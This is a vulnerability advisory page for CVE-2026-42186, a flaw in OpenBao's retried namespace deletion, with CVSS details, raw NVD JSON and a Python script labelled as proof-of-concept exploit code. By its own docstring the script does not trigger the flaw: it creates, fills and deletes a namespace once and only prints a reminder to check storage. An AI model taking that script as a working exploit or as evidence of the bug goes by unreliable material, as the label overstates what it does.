Security Vulnerability Report
CVE-2026-42186 CVSS 7.5 HIGH

CVE-2026-42186

Published: 2026-05-14 15:16:46
Last Modified: 2026-05-18 14:10:48

Description

OpenBao is an open source identity-based secrets management system. Prior to 2.5.3, when OpenBao's initial namespace deletion fails, subsequent retries fail to properly remove all data before marking the namespace as deleted. This can affect any outstanding leases and may leave unrelated storage entries behind. This vulnerability is fixed in 2.5.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:* - VULNERABLE
OpenBao < 2.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
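"""Demonstration harness for CVE-2026-42186 (OpenBao namespace deletion).

Creates a namespace, writes one KV secret into it, deletes the namespace and
prints a reminder to inspect the storage backend.  It does NOT reproduce the
vulnerable condition: the advisory concerns a *failed* initial deletion that
is later retried, and nothing here makes the first delete fail.  The residual
check is a stub -- confirming leftover entries requires operator access to the
storage backend, which this script does not have.

Every HTTP call carries a timeout so a stalled server cannot hang the run,
and the token is read from the environment when set so it need not live in
source; the original hard-coded defaults are kept as fallbacks.
"""
import os
import time  # retained from the original listing; not used below

import requests

# Configuration
OPENBAO_ADDR = "http://localhost:8200"
# Admin token needed.  Prefer the VAULT_TOKEN environment variable; the
# literal below is only a local-dev placeholder.
VAULT_TOKEN = os.environ.get("VAULT_TOKEN", "root_token")
NAMESPACE_NAME = "test-ns-cve-2026-42186"
# Seconds before a request is abandoned (requests has no default timeout).
REQUEST_TIMEOUT = 10

# Headers: all calls are made against the root namespace unless overridden.
headers = {"X-Vault-Token": VAULT_TOKEN, "X-Vault-Namespace": "root"}


def create_namespace(ns_name):
    """Create namespace *ns_name* under root and print the HTTP status.

    Args:
        ns_name: Namespace path segment to create.

    Returns:
        The ``requests.Response`` so callers can inspect it if they wish.
    """
    url = f"{OPENBAO_ADDR}/v1/sys/namespaces/{ns_name}"
    r = requests.post(url, headers=headers, timeout=REQUEST_TIMEOUT)
    print(f"Create Namespace: {r.status_code}")
    return r


def write_secret(ns_name, path, data):
    """Write *data* to KV v2 path *path* inside ``root/<ns_name>``.

    Args:
        ns_name: Namespace the secret is written into.
        path: Path below ``secret/data/`` in that namespace.
        data: JSON-serialisable mapping stored as the secret's ``data``.

    Returns:
        The ``requests.Response``.
    """
    # Only the namespace header differs from the root-scoped defaults.
    ns_headers = headers.copy()
    ns_headers["X-Vault-Namespace"] = f"root/{ns_name}"
    # NOTE(review): assumes a KV v2 engine is mounted at ``secret/`` inside
    # the namespace.  Namespaces have their own mount table, so a freshly
    # created one may need that mount enabled first -- confirm against the
    # target server.
    url = f"{OPENBAO_ADDR}/v1/secret/data/{path}"
    r = requests.post(url, headers=ns_headers, json={"data": data}, timeout=REQUEST_TIMEOUT)
    print(f"Write Secret: {r.status_code}")
    return r


def delete_namespace(ns_name):
    """Delete namespace *ns_name* with a single DELETE and print the status.

    The advisory's condition is a first deletion that *fails* and is then
    retried; one successful DELETE does not exercise that path, so a 2xx
    here says nothing about whether the fixed or vulnerable code ran.

    Args:
        ns_name: Namespace path segment to delete.

    Returns:
        The ``requests.Response``.
    """
    url = f"{OPENBAO_ADDR}/v1/sys/namespaces/{ns_name}"
    r = requests.delete(url, headers=headers, timeout=REQUEST_TIMEOUT)
    print(f"Delete Namespace: {r.status_code}")
    return r


def check_residual_data(ns_name, path):
    """Print a reminder to verify that *ns_name* left nothing behind.

    This is a stub: it performs no lookup and *path* is unused.  A genuine
    verification would be done by an operator against the storage backend
    (or by comparing lease/storage listings before and after), which is
    outside the reach of the HTTP API used here.

    Args:
        ns_name: Namespace that was deleted.
        path: Secret path that was written; reported for context only.
    """
    print(f"Checking for residual data in {ns_name}...")
    # Logic to query storage backend directly would go here
    print("[!] If vulnerable, data might persist in storage despite namespace deletion.")


def main():
    """Run the create -> write -> delete -> check sequence once."""
    create_namespace(NAMESPACE_NAME)
    write_secret(NAMESPACE_NAME, "api-key", {"key": "secret_value"})
    delete_namespace(NAMESPACE_NAME)
    check_residual_data(NAMESPACE_NAME, "api-key")


if __name__ == "__main__":
    main()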

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42186", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:46.337", "lastModified": "2026-05-18T14:10:48.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenBao is an open source identity-based secrets management system. Prior to 2.5.3, when OpenBao's initial namespace deletion fails, subsequent retries fail to properly remove all data before marking the namespace as deleted. This can affect any outstanding leases as well as potentially leaving unrelated storage entries around. This vulnerability is fixed in 2.5.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.3", "matchCriteriaId": "FB9CD431-A4A7-47AC-8111-76D4F60A9D07"}]}]}], "references": [{"url": "https://github.com/openbao/openbao/commit/6d2e0506e2b41be0eaa6643bf7b4efc9a2c09445", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openbao/openbao/releases/tag/v2.5.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/openbao/openbao/security/advisories/GHSA-vv66-6rp4-wr4f", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}